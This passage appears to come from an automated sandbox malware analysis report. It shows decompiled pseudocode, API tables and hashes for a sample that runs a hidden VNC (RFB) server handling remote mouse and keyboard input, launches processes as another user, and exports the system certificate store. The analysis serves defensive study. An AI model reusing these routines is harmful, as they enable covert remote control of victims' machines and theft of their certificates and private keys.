						if(_v16 != 0) {
							 *_t68(_v16);
						}
					}
					FreeLibrary(_v24);
				}
				return _v5 & 0x000000ff;
			}

0x012bbae5
0x012bbae8
0x012bbaeb
0x012bbaee
0x012bbaf4
0x012bbaf9
0x012bbb17
0x012bbb1b
0x012bbb1f
0x012bbb35
0x012bbb38
0x012bbb3c
0x012bbb43
0x012bbb3e
0x012bbb3e
0x012bbb3e
0x012bbb48
0x012bbb4c
0x012bbb51
0x012bbb55
0x012bbb5c
0x012bbb64
0x012bbb67
0x012bbb6a
0x012bbb6d
0x012bbb6d
0x012bbb70
0x012bbb75
0x012bbb77
0x012bbb77
0x012bbb85
0x012bbba4
0x012bbba9
0x012bbbc3
0x012bbbc8
0x012bbbab
0x012bbbb3
0x012bbbb3
0x012bbbcd
0x012bbbcd
0x012bbbd4
0x012bbbd9
0x012bbbd9
0x012bbbd4
0x012bbbde
0x012bbbe5
0x012bbbec

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 012BBAEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 012BBB0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 012BBB19
CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,?,?,?,?,?), ref: 012BBB9C
CloseHandle.KERNEL32(?), ref: 012BBBC3
CloseHandle.KERNEL32(?), ref: 012BBBC8
FreeLibrary.KERNEL32(?), ref: 012BBBDE

Strings

CreateEnvironmentBlock, xrefs: 012BBB07
DestroyEnvironmentBlock, xrefs: 012BBB0F
userenv.dll, xrefs: 012BBAE0

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 80e361039eb868d51a6d05c525408898be9ba5aaa85279a6f6ee297f000d2cb1
Instruction ID: 63b50b9af0edc96d96262f47cc3d7520da77e527d5032e275bd4614af4ede7ee
Opcode Fuzzy Hash: 80e361039eb868d51a6d05c525408898be9ba5aaa85279a6f6ee297f000d2cb1
Instruction Fuzzy Hash: CB314C72D1020EAFDF209FA9DC85DEEBFB9EB44344F04446AEA01B7154E6359940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012CAFE4 Relevance: 14.6, APIs: 5, Strings: 3, Instructions: 648
synchronizationnetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E012CAFE4(char __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, signed char _a15, void* _a16, intOrPtr _a20) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v21;
				signed short _v23;
				signed int _v24;
				signed int _v28;
				char _v29;
				signed int _v36;
				signed int _v40;
				short _v45;
				short _v47;
				char _v48;
				char _v53;
				char _v56;
				char _v57;
				char _v60;
				char _v64;
				intOrPtr _v68;
				signed int _v81;
				char _v82;
				unsigned int _v84;
				signed int _v88;
				char _v104;
				signed short _v106;
				signed short _v108;
				void* _v113;
				char _v116;
				char _v120;
				char _v128;
				char _v384;
				char _v640;
				void* __ebx;
				void* __esi;
				void* _t219;
				char _t220;
				signed char _t221;
				void* _t226;
				signed int _t233;
				void* _t250;
				signed int _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t269;
				void* _t274;
				void* _t277;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed short _t292;
				unsigned int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				intOrPtr _t299;
				signed int _t303;
				signed int _t304;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed char _t324;
				signed char _t326;
				signed char _t328;
				signed int _t340;
				signed int _t349;
				signed int _t356;
				signed int _t357;
				signed int _t365;
				void* _t370;
				signed int _t375;
				signed int _t376;
				signed int _t391;
				void* _t392;
				unsigned int _t446;
				signed char _t459;
				void* _t500;
				void* _t504;
				signed int _t517;
				signed int _t519;
				signed int _t528;
				signed int _t529;
				void* _t542;
				intOrPtr _t546;
				signed int _t548;
				signed int _t549;
				signed int _t553;
				intOrPtr _t558;
				void* _t559;

				_v68 = __edx;
				_v8 = __ecx;
				_t220 = L012B182A(_t219, __ecx, "RFB 003.003\n", 0xc);
				if(_t220 == 0) {
					L108:
					return _t220;
				}
				_t220 = L012B19E7(_v8,  &_v64, 0xc, _v68);
				if(_t220 == 0) {
					goto L108;
				}
				_t220 = L012B16C2(_t220,  &_v64, "RFB ", 4, 4);
				if(_t220 != 0) {
					goto L108;
				}
				_v57 = _t220;
				_v53 = _t220;
				_t221 = L012B134D( &_v56, 0);
				_t226 = ((L012B134D( &_v60, 0) & 0x000000ff | (_t221 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t226 > 0x300) {
					L107:
					return _t226;
				} else {
					_t558 = _a4;
					_v36 = _v36 & 0x00000000;
					_v12 = 1;
					 *((intOrPtr*)(_t558 + 4))( &_v36, _t542, _t370);
					_v40 = (_v12 & 0x00ff0000 | _v12 >> 0x00000010) >> 0x00000008 | (_v12 & 0x0000ff00 | _v12 << 0x00000010) << 0x00000008;
					_t405 = _v8;
					if(L012B182A(_v12 << 0x10, _v8,  &_v40, 4) == 0) {
						_v12 = _v12 | 0xffffffff;
					}
					_t233 = _v12;
					if(_t233 == 0) {
						_t226 = E012CAF7F(_t405, __eflags, _v8, _v36);
						L106:
						goto L107;
					}
					_t226 = _t233 - 1;
					if(_t226 != 0) {
						goto L106;
					}
					_t226 = L012B19E7(_v8,  &_v29, 1, _v68);
					if(_t226 == 0) {
						goto L106;
					}
					_t226 =  *((intOrPtr*)(_t558 + 8))();
					if(_t226 == 0) {
						goto L106;
					}
					_v36 = _v36 & 0x00000000;
					_t226 =  *((intOrPtr*)(_t558 + 0xc))( &_v128);
					_t374 = _t226;
					_t572 = _t226;
					if(_t226 == 0) {
						goto L106;
					}
					_t226 = E012CADCF( &_v128, _t374, _t572, _a8, _a12);
					_t559 = _t226;
					if(_t559 == 0) {
						goto L106;
					}
					_t375 = L012B1BE0(_v36);
					_v108 =  *(_t559 + 8) << 0x00000008 |  *(_t559 + 9) & 0x000000ff;
					_v106 =  *(_t559 + 0xa) << 0x00000008 |  *(_t559 + 0xb) & 0x000000ff;
					_v88 = (_t375 & 0x00ff0000 | _t375 >> 0x00000010) >> 0x00000008 | (_t375 << 0x00000010 | _t375 & 0x0000ff00) << 0x00000008;
					_t48 = _t559 + 0x20; // 0x20
					_t250 = L012B1947( &_v104, _t48, 0x10);
					asm("rol word [ebp-0x60], 0x8");
					asm("rol word [ebp-0x5e], 0x8");
					asm("rol word [ebp-0x5c], 0x8");
					if(L012B182A(_t250, _v8,  &_v108, 0x18) == 0 || _t375 != 0 && L012B182A(_t251, _v8, _v36, _t375) == 0) {
						_t226 = E012CAF4C(_t559);
						goto L106;
					} else {
						_v47 = 0xffff;
						_v48 = 0;
						_v45 = 0xffff;
						L012B19F6( &_v384, 0xff);
						L012B19F6( &_v640, 0xff);
						_v12 = _v12 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						goto L16;
						do {
							do {
								while(1) {
									L16:
									_t376 = 0;
									if(_v12 <= 0) {
										goto L35;
									}
									L17:
									_t269 = L012B10C8( &_v8, 1, _a20, 0, 0);
									if(_t269 != 0xffffffff) {
										goto L35;
									}
									__imp__#111();
									if(_t269 != 0x274c) {
										L103:
										E012CAF4C(_t559);
										_t226 = L012B1933(_v28);
										goto L106;
									}
									if(_a16 != 0) {
										WaitForSingleObject(_a16, 0xffffffff);
									}
									 *((intOrPtr*)(_a4 + 0x10))();
									_v16 = _t376;
									if(_v12 <= _t376) {
										L33:
										if(_a16 != _t376) {
											ReleaseMutex(_a16);
										}
										while(1) {
											L16:
											_t376 = 0;
											if(_v12 <= 0) {
												goto L35;
											}
											goto L17;
										}
									} else {
										_t392 = 0;
										_t548 = _v12 * 9;
										do {
											_t274 = _v28 + _t392;
											if( *((short*)(_t274 + 5)) > 0 &&  *((short*)(_t274 + 7)) > 0) {
												_push(_t274);
												_push(_v8);
												_t277 = E012CAAB5(_t559);
												if(_t277 == 0xffffffff || _t277 == 0) {
													__eflags = _a16;
													if(_a16 != 0) {
														ReleaseMutex(_a16);
													}
													goto L103;
												} else {
													if(_t277 == 1) {
														if(_v16 + 1 != _v12) {
															_t504 = 9;
															L012B19F6(_t392 + _v28, _t504);
														} else {
															_v12 = _v12 - 1;
															_t548 = _t548 - 9;
															L012B1C26( &_v28, _t548);
														}
													}
													goto L31;
												}
											}
											L31:
											_v16 = _v16 + 1;
											_t392 = _t392 + 9;
										} while (_v16 < _v12);
										_t376 = 0;
										goto L33;
									}
									L35:
									_t546 = _v68;
									_t255 = L012B19E7(_v8,  &_a15, 1, _t546);
									__eflags = _t255;
									if(_t255 == 0) {
										goto L103;
									}
									_t258 = (_a15 & 0x000000ff) - _t376;
									__eflags = _t258;
									if(_t258 == 0) {
										_push(_t546);
										_t500 = 3;
										_t259 = L012B1B90(_v8, _t500);
										__eflags = _t259;
										if(_t259 == 0) {
											goto L103;
										}
										_t260 = L012B19E7(_v8,  &_v84, 0x10, _t546);
										__eflags = _t260;
										if(_t260 == 0) {
											goto L103;
										}
										_t261 = E012CAD8B( &_v84, _t376);
										__eflags = _t261;
										if(_t261 == 0) {
											goto L103;
										}
										asm("rol word [ebp-0x4c], 0x8");
										asm("rol word [ebp-0x4a], 0x8");
										asm("rol word [ebp-0x48], 0x8");
										__eflags = _v81 - _t376;
										_t262 = _t261 & 0xffffff00 | _v81 != _t376;
										__eflags = _v82 - _t376;
										_v81 = _t262;
										_v82 = _t262 & 0xffffff00 | _v82 != _t376;
										_t211 = _t559 + 0x31; // 0x31
										L012B1947(_t211,  &_v84, 0x10);
										 *(_t559 + 0x41) = _v84 >> 3;
										while(1) {
											L16:
											_t376 = 0;
											if(_v12 <= 0) {
												goto L35;
											}
											goto L17;
										}
									}
									_t286 = _t258;
									__eflags = _t286;
									if(_t286 == 0) {
										_t287 = L012B1B90(_v8, 1, _t546);
										__eflags = _t287;
										if(_t287 == 0) {
											goto L103;
										}
										_t288 = L012B19E7(_v8,  &_a8, 2, _t546);
										__eflags = _t288;
										if(_t288 == 0) {
											goto L103;
										}
										_t292 = (_a8 & 0xff) << 0x00000008 | (_a8 & 0x0000ffff) >> 0x00000008;
										 *(_t559 + 0x4c) = _t376;
										 *(_t559 + 0x48) = _t292;
										__eflags = _t292 - _t376;
										if(_t292 <= _t376) {
											L90:
											_t549 = 0xff00;
											L91:
											_t293 =  *(_t559 + 0x4c);
											 *(_t559 + 0x50) = (_t293 << 0x00000010 | _t293 & _t549) << 0x00000008 | _t293 >> 0x00000008 & _t549 |  *(_t559 + 0x4f) & 0x000000ff;
											__eflags = _t293 - 5;
											if(_t293 != 5) {
												L012B1933( *(_t559 + 0x1c));
												 *(_t559 + 0x1c) =  *(_t559 + 0x1c) & 0x00000000;
												while(1) {
													L16:
													_t376 = 0;
													if(_v12 <= 0) {
														goto L35;
													}
													goto L17;
												}
											}
											break;
										}
										_t378 = (_t292 & 0x0000ffff) << 2;
										_t172 = _t559 + 0x44; // 0x44
										_t296 = L012B1C26(_t172, (_t292 & 0x0000ffff) << 2);
										__eflags = _t296;
										if(_t296 == 0) {
											goto L103;
										}
										_t297 = L012B19E7(_v8,  *((intOrPtr*)(_t559 + 0x44)), _t378, _t546);
										__eflags = _t297;
										if(_t297 == 0) {
											goto L103;
										}
										_v16 = _v16 & 0x00000000;
										__eflags = 0 -  *(_t559 + 0x48);
										if(0 >=  *(_t559 + 0x48)) {
											goto L90;
										}
										_t299 =  *((intOrPtr*)(_t559 + 0x44));
										do {
											_t517 = _v16 & 0x0000ffff;
											_t445 = _t299 + _t517 * 4;
											_t549 = 0xff00;
											 *_t445 = ( *(_t299 + _t517 * 4) << 0x00000010 |  *(_t299 + _t517 * 4) & 0x0000ff00) << 0x00000008 | _t445[0] & 0x000000ff |  *(_t299 + _t517 * 4) >> 0x00000008 & 0x0000ff00;
											_t299 =  *((intOrPtr*)(_t559 + 0x44));
											_t446 = 5;
											__eflags =  *(_t299 + _t517 * 4) - _t446;
											if( *(_t299 + _t517 * 4) == _t446) {
												 *(_t559 + 0x4c) = _t446;
											}
											_v16 = _v16 + 1;
											__eflags = _v16 -  *(_t559 + 0x48);
										} while (_v16 <  *(_t559 + 0x48));
										goto L91;
									}
									_t303 = _t286 - 1;
									__eflags = _t303;
									if(_t303 == 0) {
										_t304 = L012B19E7(_v8,  &_v60, 9, _t546);
										__eflags = _t304;
										if(_t304 == 0) {
											goto L103;
										}
										asm("rol word [ebp-0x37], 0x8");
										asm("rol word [ebp-0x35], 0x8");
										asm("rol word [ebp-0x33], 0x8");
										asm("rol word [ebp-0x31], 0x8");
										__eflags = _v60 - _t376;
										_t519 = _v12;
										_v60 = _t304 & 0xffffff00 | _v60 != _t376;
										__eflags = _t519;
										if(_t519 == 0) {
											L76:
											__eflags = _t376 - _t519;
											if(_t376 != _t519) {
												L78:
												L012B1947(_t376 * 9 + _v28,  &_v60, 9);
												while(1) {
													L16:
													_t376 = 0;
													if(_v12 <= 0) {
														goto L35;
													}
													goto L17;
												}
												goto L35;
											}
											_v12 = _t519 + 1;
											_t308 = L012B1C26( &_v28, (_t519 + 1) * 9);
											__eflags = _t308;
											if(_t308 == 0) {
												goto L103;
											}
											goto L78;
										}
										_t310 = _v28 + 7;
										__eflags = _t310;
										do {
											__eflags =  *((short*)(_t310 - 2));
											if( *((short*)(_t310 - 2)) != 0) {
												goto L75;
											}
											__eflags =  *_t310;
											if( *_t310 == 0) {
												goto L76;
											}
											L75:
											_t376 = _t376 + 1;
											_t310 = _t310 + 9;
											__eflags = _t376 - _t519;
										} while (_t376 < _t519);
										goto L76;
									}
									_t311 = _t303 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_t312 = L012B19E7(_v8,  &_v116, 7, _t546);
										__eflags = _t312;
										if(_t312 == 0) {
											goto L103;
										}
										__eflags = _v116 - _t376;
										 *((intOrPtr*)(_a4 + 0x14))((_t312 & 0xffffff00 | _v116 != _t376) & 0x000000ff);
										continue;
									}
									_t319 = _t311 - 1;
									__eflags = _t319;
									if(_t319 == 0) {
										_t528 =  &_v24;
										_t320 = L012B19E7(_v8, _t528, 5, _t546);
										__eflags = _t320;
										if(_t320 == 0) {
											goto L103;
										}
										asm("rol word [ebp-0x13], 0x8");
										asm("rol word [ebp-0x11], 0x8");
										_v16 = _v16 & _t376;
										_t553 = 0x8000;
										_t321 = GetSystemMetrics(0x17);
										__eflags = _t321;
										_t529 = _t528 & 0xffffff00 | _t321 != 0x00000000;
										__eflags = _v23 - _v47;
										if(_v23 != _v47) {
											L50:
											_t553 = 0x8001;
											L51:
											_t459 = _v48;
											_t324 = _v24 & 0x00000001;
											__eflags = _t324 - (_t459 & 0x00000001);
											if(_t324 != (_t459 & 0x00000001)) {
												__eflags = _t324;
												if(_t324 == 0) {
													__eflags = _t529;
													_t349 = ((0 | _t529 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
													__eflags = _t349;
												} else {
													__eflags = _t529;
													_t349 = ((0 | _t529 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
												}
												_t553 = _t553 | _t349;
												__eflags = _t553;
											}
											_t326 = _v24 & 0x00000004;
											__eflags = _t326 - (_t459 & 0x00000004);
											if(_t326 != (_t459 & 0x00000004)) {
												__eflags = _t326;
												if(_t326 == 0) {
													__eflags = _t529;
													_t340 = ((0 | _t529 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
													__eflags = _t340;
												} else {
													__eflags = _t529;
													_t340 = ((0 | _t529 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
												}
												_t553 = _t553 | _t340;
												__eflags = _t553;
											}
											_t328 = _v24 & 0x00000002;
											__eflags = _t328 - (_t459 & 0x00000002);
											if(_t328 != (_t459 & 0x00000002)) {
												__eflags = _t328;
												_t553 = _t553 | ((0 | _t328 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
												__eflags = _t553;
											}
											__eflags = _v24 & 0x00000008;
											if((_v24 & 0x00000008) != 0) {
												_t553 = _t553 | 0x00000800;
												__eflags = _t553;
												_v16 = 0x78;
											}
											__eflags = _v24 & 0x00000010;
											if((_v24 & 0x00000010) != 0) {
												__eflags = _t553;
												_v16 = 0xffffff88;
											}
											L012B1947( &_v48,  &_v24, 5);
											 *((intOrPtr*)(_a4 + 0x18))(_v23 & 0x0000ffff, _v21 & 0x0000ffff, _v16);
											continue;
										}
										__eflags = _v21 - _v45;
										if(_v21 == _v45) {
											goto L51;
										}
										goto L50;
									}
									__eflags = _t319 != 1;
									if(_t319 != 1) {
										goto L103;
									}
									_t356 = L012B19E7(_v8,  &_v120, 3, _t546);
									__eflags = _t356;
									if(_t356 == 0) {
										goto L103;
									}
									_t357 = L012B19E7(_v8,  &_v40, 4, _t546);
									__eflags = _t357;
									if(_t357 == 0) {
										goto L103;
									}
									_v40 = (_v40 & 0x00ff0000 | _v40 >> 0x00000010) >> 0x00000008 | (_v40 << 0x00000010 | _v40 & 0x0000ff00) << 0x00000008;
									_t391 = L012B1C17(((_v40 & 0x00ff0000 | _v40 >> 0x00000010) >> 0x00000008 | (_v40 << 0x00000010 | _v40 & 0x0000ff00) << 0x00000008) + 1);
									__eflags = _t391;
									if(_t391 == 0) {
										__eflags = 0;
										L012B1933(0);
										goto L103;
									}
									_t365 = L012B19E7(_v8, _t391, _v40, _t546);
									__eflags = _t365;
									if(_t365 == 0) {
										goto L103;
									}
									 *((intOrPtr*)(_a4 + 0x1c))(_t391);
									L012B1933(_t391);
								}
								__eflags =  *(_t559 + 0x1c);
							} while ( *(_t559 + 0x1c) != 0);
							_t295 = L012B1C17(0x400);
							 *(_t559 + 0x1c) = _t295;
							__eflags = _t295;
						} while (_t295 != 0);
						goto L103;
					}
				}
			}

0x012cafed
0x012caff7
0x012caffa
0x012cb001
0x012cb7b6
0x012cb7b6
0x012cb7b6
0x012cb012
0x012cb019
0x00000000
0x00000000
0x012cb02b
0x012cb032
0x00000000
0x00000000
0x012cb03e
0x012cb041
0x012cb044
0x012cb063
0x012cb070
0x012cb7b4
0x00000000
0x012cb076
0x012cb076
0x012cb07b
0x012cb08b
0x012cb08e
0x012cb0b9
0x012cb0bc
0x012cb0cb
0x012cb0cd
0x012cb0cd
0x012cb0d4
0x012cb0d7
0x012cb7ad
0x012cb7b2
0x00000000
0x012cb7b3
0x012cb0dd
0x012cb0de
0x00000000
0x00000000
0x012cb0ee
0x012cb0f5
0x00000000
0x00000000
0x012cb104
0x012cb109
0x00000000
0x00000000
0x012cb111
0x012cb11c
0x012cb11f
0x012cb121
0x012cb123
0x00000000
0x00000000
0x012cb132
0x012cb137
0x012cb13b
0x00000000
0x00000000
0x012cb14d
0x012cb15a
0x012cb16d
0x012cb193
0x012cb198
0x012cb1a0
0x012cb1a5
0x012cb1aa
0x012cb1b2
0x012cb1c3
0x012cb7a0
0x00000000
0x012cb1e1
0x012cb1e8
0x012cb1f9
0x012cb1fd
0x012cb201
0x012cb20e
0x012cb213
0x012cb217
0x012cb217
0x012cb21b
0x012cb21b
0x012cb21b
0x012cb21b
0x012cb21b
0x012cb220
0x00000000
0x00000000
0x012cb226
0x012cb231
0x012cb239
0x00000000
0x00000000
0x012cb23f
0x012cb24a
0x012cb791
0x012cb791
0x012cb799
0x00000000
0x012cb799
0x012cb253
0x012cb25a
0x012cb25a
0x012cb265
0x012cb268
0x012cb26e
0x012cb2e5
0x012cb2e8
0x012cb2f1
0x012cb2f1
0x012cb21b
0x012cb21b
0x012cb21b
0x012cb220
0x00000000
0x00000000
0x00000000
0x012cb220
0x012cb270
0x012cb273
0x012cb275
0x012cb278
0x012cb27b
0x012cb282
0x012cb28b
0x012cb28c
0x012cb291
0x012cb299
0x012cb779
0x012cb77d
0x012cb782
0x012cb782
0x00000000
0x012cb2a7
0x012cb2aa
0x012cb2b3
0x012cb2cf
0x012cb2d0
0x012cb2b5
0x012cb2b5
0x012cb2b8
0x012cb2c0
0x012cb2c0
0x012cb2b3
0x00000000
0x012cb2aa
0x012cb299
0x012cb2d5
0x012cb2d5
0x012cb2db
0x012cb2de
0x012cb2e3
0x00000000
0x012cb2e3
0x012cb2fc
0x012cb2fc
0x012cb308
0x012cb30d
0x012cb30f
0x00000000
0x00000000
0x012cb319
0x012cb319
0x012cb31b
0x012cb710
0x012cb713
0x012cb714
0x012cb719
0x012cb71b
0x00000000
0x00000000
0x012cb726
0x012cb72b
0x012cb72d
0x00000000
0x00000000
0x012cb733
0x012cb738
0x012cb73a
0x00000000
0x00000000
0x012cb73c
0x012cb741
0x012cb746
0x012cb74b
0x012cb750
0x012cb753
0x012cb756
0x012cb75c
0x012cb762
0x012cb766
0x012cb771
0x012cb21b
0x012cb21b
0x012cb21b
0x012cb220
0x00000000
0x00000000
0x00000000
0x012cb220
0x012cb21b
0x012cb322
0x012cb322
0x012cb323
0x012cb5dd
0x012cb5e2
0x012cb5e4
0x00000000
0x00000000
0x012cb5f3
0x012cb5f8
0x012cb5fa
0x00000000
0x00000000
0x012cb611
0x012cb613
0x012cb616
0x012cb61a
0x012cb61d
0x012cb6ab
0x012cb6ab
0x012cb6b0
0x012cb6b0
0x012cb6d0
0x012cb6d3
0x012cb6d6
0x012cb6ff
0x012cb704
0x012cb21b
0x012cb21b
0x012cb21b
0x012cb220
0x00000000
0x00000000
0x00000000
0x012cb220
0x012cb21b
0x00000000
0x012cb6d6
0x012cb626
0x012cb62b
0x012cb62e
0x012cb633
0x012cb635
0x00000000
0x00000000
0x012cb643
0x012cb648
0x012cb64a
0x00000000
0x00000000
0x012cb650
0x012cb656
0x012cb65a
0x00000000
0x00000000
0x012cb65c
0x012cb65f
0x012cb65f
0x012cb663
0x012cb683
0x012cb68c
0x012cb68e
0x012cb693
0x012cb694
0x012cb697
0x012cb699
0x012cb699
0x012cb69c
0x012cb6a3
0x012cb6a3
0x00000000
0x012cb6a9
0x012cb329
0x012cb329
0x012cb32a
0x012cb558
0x012cb55d
0x012cb55f
0x00000000
0x00000000
0x012cb565
0x012cb56a
0x012cb56f
0x012cb574
0x012cb579
0x012cb57c
0x012cb582
0x012cb585
0x012cb587
0x012cb5a4
0x012cb5a4
0x012cb5a6
0x012cb5bf
0x012cb5cc
0x012cb21b
0x012cb21b
0x012cb21b
0x012cb220
0x00000000
0x00000000
0x00000000
0x012cb220
0x00000000
0x012cb21b
0x012cb5a9
0x012cb5b2
0x012cb5b7
0x012cb5b9
0x00000000
0x00000000
0x00000000
0x012cb5b9
0x012cb58c
0x012cb58c
0x012cb58f
0x012cb58f
0x012cb594
0x00000000
0x00000000
0x012cb596
0x012cb59a
0x00000000
0x00000000
0x012cb59c
0x012cb59c
0x012cb59d
0x012cb5a0
0x012cb5a0
0x00000000
0x012cb58f
0x012cb330
0x012cb330
0x012cb331
0x012cb505
0x012cb50a
0x012cb50c
0x00000000
0x00000000
0x012cb512
0x012cb547
0x00000000
0x012cb547
0x012cb337
0x012cb337
0x012cb338
0x012cb3e0
0x012cb3e3
0x012cb3e8
0x012cb3ea
0x00000000
0x00000000
0x012cb3f0
0x012cb3f5
0x012cb3fa
0x012cb3ff
0x012cb404
0x012cb40a
0x012cb410
0x012cb413
0x012cb417
0x012cb423
0x012cb423
0x012cb428
0x012cb428
0x012cb430
0x012cb435
0x012cb437
0x012cb439
0x012cb43b
0x012cb44f
0x012cb458
0x012cb458
0x012cb43d
0x012cb43f
0x012cb448
0x012cb448
0x012cb45b
0x012cb45b
0x012cb45b
0x012cb462
0x012cb467
0x012cb469
0x012cb46b
0x012cb46d
0x012cb481
0x012cb48a
0x012cb48a
0x012cb46f
0x012cb471
0x012cb47a
0x012cb47a
0x012cb48d
0x012cb48d
0x012cb48d
0x012cb492
0x012cb497
0x012cb499
0x012cb49d
0x012cb4a9
0x012cb4a9
0x012cb4a9
0x012cb4ab
0x012cb4af
0x012cb4b1
0x012cb4b1
0x012cb4b7
0x012cb4b7
0x012cb4be
0x012cb4c2
0x012cb4c4
0x012cb4ca
0x012cb4ca
0x012cb4db
0x012cb4f4
0x00000000
0x012cb4f4
0x012cb41d
0x012cb421
0x00000000
0x00000000
0x00000000
0x012cb421
0x012cb33e
0x012cb33f
0x00000000
0x00000000
0x012cb34e
0x012cb353
0x012cb355
0x00000000
0x00000000
0x012cb364
0x012cb369
0x012cb36b
0x00000000
0x00000000
0x012cb39a
0x012cb3a2
0x012cb3a4
0x012cb3a6
0x012cb78a
0x012cb78c
0x00000000
0x012cb78c
0x012cb3b5
0x012cb3ba
0x012cb3bc
0x00000000
0x00000000
0x012cb3cb
0x012cb3d0
0x012cb3d0
0x012cb6d8
0x012cb6d8
0x012cb6e7
0x012cb6ec
0x012cb6ef
0x012cb6ef
0x00000000
0x012cb6f7
0x012cb1c3

APIs

WSAGetLastError.WS2_32(00000000,00000000,00000000,00000031,?,00000010,00000000,00000010,?,?,00000001,?,00000018,?,00000020,00000010), ref: 012CB23F
WaitForSingleObject.KERNEL32(?,000000FF,?,00000010,00000000,00000010,?,?,00000001,?,00000018,?,00000020,00000010), ref: 012CB25A
ReleaseMutex.KERNEL32(?,?,00000010,00000000,00000010,?,?,00000001,?,00000018,?,00000020,00000010), ref: 012CB2F1
GetSystemMetrics.USER32 ref: 012CB404
ReleaseMutex.KERNEL32(00000000,?,00000010,00000000,00000010,?,?,00000001,?,00000018,?,00000020,00000010), ref: 012CB782

Strings

RFB 003.003, xrefs: 012CAFF2
x, xrefs: 012CB4B7
RFB , xrefs: 012CB023

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: MutexRelease$ErrorLastMetricsObjectSingleSystemWait
String ID: RFB $RFB 003.003$x
API String ID: 1533360952-1851049915
Opcode ID: afcf159df9564ba54f221cbc338c6f7ecdf201a49181d19df21a5c1f103524da
Instruction ID: ed2dfa293be76cbb3fb1ba8e39c613806ca691a225ea809f510bbbc64c7ed821
Opcode Fuzzy Hash: afcf159df9564ba54f221cbc338c6f7ecdf201a49181d19df21a5c1f103524da
Instruction Fuzzy Hash: 8D324E31E2020A9BDF18DFA8C8927FD7BB2EF95780F18465DDB41A7281DB748949C750

Uniqueness

Uniqueness Score: -1.00%

Function 012B3813 Relevance: 12.1, APIs: 8, Instructions: 121encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 012B3829
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 012B3845
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 012B3850
PFXExportCertStoreEx.CRYPT32(00000000,?,?,00000000,00000004), ref: 012B3887
PFXExportCertStoreEx.CRYPT32(00000000,?,?,00000000,00000004), ref: 012B38B0
CharLowerW.USER32(?,000000FF), ref: 012B38CB
GetSystemTime.KERNEL32(?), ref: 012B38D5
CertCloseStore.CRYPT32(00000000,00000000), ref: 012B394A

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

